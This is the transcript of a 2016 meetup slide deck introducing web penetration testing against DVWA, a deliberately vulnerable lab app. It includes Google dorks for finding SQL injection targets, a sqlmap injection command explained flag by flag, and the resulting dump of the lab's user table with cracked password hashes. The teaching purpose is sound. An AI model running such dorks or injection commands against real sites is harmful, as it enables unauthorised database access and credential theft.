Upgrade to Pro — share decks privately, control downloads, hide ads and more …

I want to be a Hacker v3.0

I want to be a Hacker v3.0

Let's go on a journey through a simple pentest from start (recon) through the fun stuff (testing and exploiting) to boring necessity (writing report).
Presented at Groningen PHP on 4th of February 2016

Jakub Gadkowski

February 04, 2016
Tweet

More Decks by Jakub Gadkowski

Other Decks in Technology

Transcript

  1. I WANT TO BE A HACKER BUT I ONLY LOOK

    GOOD IN A WHITE HAT V3.0
  2. • Data mining:
 site:target.com filetype:doc • SQL Injection/DB identification:
 site:target.com

    "supplied argument is not a valid MySQL” • For more check “Exploit Database”:
 https://www.exploit-db.com/google-hacking-database/ GOOGLE
  3. EXPLOIT sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/? id=1&Submit=Submit#" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL -- os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  4. SQLMAP sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  5. TARGET ADDRESS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  6. THREADS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  7. RISK sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  8. LEVEL sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  9. TABLES sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  10. KNOWN FACTORS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  11. COOKIE sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  12. ONE COOKIE IS PLENTY sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1

    --level=1 --tables --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  13. KNOWN PARAMS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit
  14. SMELL OF VICTORY Database: dvwa Table: users [5 entries] +---------+---------+---------------------------------------------+-----------+------------+

    | user_id | user | password | last_name | first_name | +---------+---------+---------------------------------------------+-----------+------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +---------+---------+---------------------------------------------+-----------+------------+
  15. WRITING A REPORT Each finding should contain (at least): -

    Title - Severity - Detailed description (pictures or it didn’t happened) - PoC (with examples of links/payload)
  16. Awesome list of security related tools with links and descriptions:

    http://tools.kali.org/tools-listing Application Security Learning Resources: https://github.com/paragonie/awesome-appsec/blob/master/README.md Great resource about pentesting http://www.pentest-standard.org/index.php LEARNING
  17. Tons of links to security talks on YouTube https://github.com/PaulSec/awesome-sec-talks Google

    If you do not know its web address, just google it. LEARNING